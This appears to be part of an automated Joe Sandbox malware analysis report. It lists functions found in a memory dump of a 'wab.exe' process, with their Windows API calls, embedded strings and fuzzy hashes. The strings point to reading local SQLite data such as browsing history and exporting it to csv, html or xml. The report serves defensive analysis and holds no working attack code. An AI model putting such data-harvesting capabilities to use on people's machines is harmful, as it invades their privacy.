                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2618321458-3614832568
                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004185FC
                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@AttributesFilememset
                                                  • String ID:
                                                  • API String ID: 776155459-0
                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                  • malloc.MSVCRT ref: 00417524
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2308052813-0
                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PathTemp$??3@
                                                  • String ID: %s\etilqs_$etilqs_
                                                  • API String ID: 1589464350-1420421710
                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040FDD5
                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 1775345501-2769808009
                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0041477F
                                                  • wcscpy.MSVCRT ref: 0041479A
                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  • API String ID: 999786162-26480598
                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 313946961-1552265934
                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  • API String ID: 0-1953309616
                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  • API String ID: 3510742995-272990098
                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: gj
                                                  • API String ID: 1297977491-4203073231
                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                  • malloc.MSVCRT ref: 004174BD
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2903831945-0
                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040D453
                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  • API String ID: 1471605966-0
                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0044475F
                                                  • wcscat.MSVCRT ref: 0044476E
                                                  • wcscat.MSVCRT ref: 0044477F
                                                  • wcscat.MSVCRT ref: 0044478E
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                  • String ID: \StringFileInfo\
                                                  • API String ID: 102104167-2245444037
                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$??3@
                                                  • String ID: g4@
                                                  • API String ID: 3314356048-2133833424
                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: @@@@$History
                                                  • API String ID: 1872909662-685208920
                                                  • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                  • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004100FB
                                                  • memset.MSVCRT ref: 00410112
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 00410141
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                  • String ID: </%s>
                                                  • API String ID: 3400436232-259020660
                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040D58D
                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  • API String ID: 1523050162-4135340389
                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 210187428-168460110
                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  • API String ID: 2747424523-2167791130
                                                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 3150196962-1506664499
                                                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp
                                                  • String ID:
                                                  • API String ID: 3384217055-0
                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                  Uniqueness

